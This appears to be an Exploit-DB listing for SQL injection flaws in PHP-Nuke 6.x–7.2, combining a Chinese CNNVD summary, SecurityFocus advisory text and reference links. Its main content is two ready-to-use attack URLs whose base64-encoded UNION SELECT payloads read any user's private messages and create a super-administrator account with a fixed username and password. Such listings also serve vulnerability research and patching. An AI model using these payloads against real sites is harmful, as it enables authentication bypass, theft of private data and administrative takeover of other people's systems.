https://www.exploit-db.com/exploits/23998
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-022

PHP-Nuke6.x到7.2版本functions.php中的bblogin函数存在SQL注入漏洞。远程攻击者可以通过向user参数注入base64-encodedSQL代码绕过验证以及获得权限。

source: http://www.securityfocus.com/bid/10135/info 

Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input.

As a result of these issues an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.

To read arbitrary users private messages:
http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

To create an arbitrary administrator account with username "waraxe2" and password "coolpass":
http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

来源:XF
名称:phpnuke-bypass-authentication(15839)
链接:http://xforce.iss.net/xforce/xfdb/15839
来源:www.waraxe.us
链接:http://www.waraxe.us/index.php?modname=sa&id;=17
来源:BID
名称:10135
链接:http://www.securityfocus.com/bid/10135
来源:SECUNIA
名称:11347
链接:http://secunia.com/advisories/11347
来源:BUGTRAQ
名称:20040412[waraxe-2004-SA#017-User-levelauthenticationbypassinphpnuke6.x-7.2]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108180111826852&w;=2